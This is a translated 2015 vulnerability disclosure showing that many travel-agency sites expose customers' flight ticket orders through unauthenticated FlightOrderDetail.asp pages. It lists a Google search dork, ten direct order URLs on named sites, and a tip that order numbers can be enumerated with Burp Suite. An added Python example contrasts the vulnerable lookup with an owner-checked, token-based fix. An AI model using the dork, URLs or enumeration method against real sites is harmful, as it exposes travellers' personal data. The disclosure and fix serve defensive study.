
Who leaked our flight ticket information? (Leaking ticket data in the travel industry is this easy)

2015-08-17 11:20

Searching Google for the keyword inurl:FlightOrderDetail.asp

exposes a large amount of flight ticket information.

Google search URL: http://www.glgoo.com/search?q=inurl%3AFlightOrderDetail.asp

Proof of vulnerability:

[Image: 证明1.png]

Large amounts of ticket information are exposed; the links can be opened directly:

http://www.cometours.com/Flight/FlightOrderDetail.asp?OrderID=0031003300300038003100360031003700330039003200360036

[Image: 证明2.png]

http://aifei-air.com/Flight/FlightOrderDetail.asp?OrderID=0031003100300034003000320031003900330039003400330031

[Image: 证明3.png]

http://www.fz1z.com/Flight/FlightOrderDetail.asp?OrderID=0031003100300037003200370032003000310039003200390035

[Image: 证明4.png]

http://www.gyjp.net/Flight/FlightOrderDetail.asp?OrderID=0031003000300035003100380031003300310038003100300038

[Image: 证明5.png]

http://www.gyjp.net/Flight/FlightOrderDetail.asp?OrderID=0031003100300032003100310031003100350031003000330037

[Image: 证明6.png]

http://www.gyjp.net/Flight/FlightOrderDetail.asp?OrderID=0031003300300031003200310031003000350033003300380031

[Image: 证明7.png]

http://www.xa88882222.com/Flight/FlightOrderDetail.asp?OrderID=0031003000300032003200380031003700310030003300320034

[Image: 证明8.png]

http://lvyouoo.com/Flight/FlightOrderDetail.asp?OrderID=0031003100300037003200320032003200340034003000390035

[Image: 证明9.png]

http://51lehang.com/Flight/FlightOrderDetail.asp?OrderID=0031003400300039003000320031003000320031003400380034

[Image: 证明10.png]

http://www.88888082.com/Flight/FlightOrderDetail.asp?OrderID=0031003400300033003000370031003500330030003500340031

[Image: 证明11.png]

There are many more. It is worth noting that the order numbers can be enumerated by brute force with Burp Suite.

Fix:
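A defender-side illustration added here, not part of the original report or the affected sites' code: the OrderID in the URLs above is nothing more than hex-encoded UTF-16 digits (decoded from the report's own first URL), so the encoding provides no protection, and the hypothetical handler below shows the missing control: the lookup is tied to the logged-in owner, and e-mailed links carry a random token instead of the guessable order number.

```python
import secrets
from typing import Optional

# Constructed in-memory order store (hypothetical; not the affected sites' data):
# order number -> owner account and ticket details.
ORDERS = {
    "1308161739266": {"owner": "alice", "passenger": "A. Chen", "flight": "XX123"},
    "1308161739267": {"owner": "bob", "passenger": "B. Li", "flight": "XX456"},
}
# Random tokens issued for "view your order" links: token -> order number.
LOOKUP_TOKENS = {}


def decode_order_id(param: str) -> str:
    """The OrderID in the report's URLs is UTF-16BE hex: '0031' -> '1'.
    Encoding is not authorization: anyone can decode and re-encode it."""
    return bytes.fromhex(param).decode("utf-16-be")


def vulnerable_detail(order_id_param: str) -> Optional[dict]:
    """The pattern behind the report: fetch by OrderID and check nothing else."""
    return ORDERS.get(decode_order_id(order_id_param))


def issue_lookup_token(order_no: str) -> str:
    """Unguessable link token (256 bits) that replaces the order number in links."""
    token = secrets.token_urlsafe(32)
    LOOKUP_TOKENS[token] = order_no
    return token


def hardened_detail(order_id_param: str, session_user: Optional[str] = None,
                    token: Optional[str] = None) -> Optional[dict]:
    """Return the order only to its logged-in owner or to a bearer of its own token."""
    try:
        order_no = decode_order_id(order_id_param)
    except (ValueError, UnicodeDecodeError):
        return None  # malformed parameter: reject instead of erroring out
    order = ORDERS.get(order_no)
    if order is None:
        return None
    if session_user is not None and order["owner"] == session_user:
        return order
    if token is not None and LOOKUP_TOKENS.get(token) == order_no:
        return order
    return None  # deny by default; a real handler would also log this for detection
```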

Source: www.wooyun.org/bugs/wooyun-2015-0123153
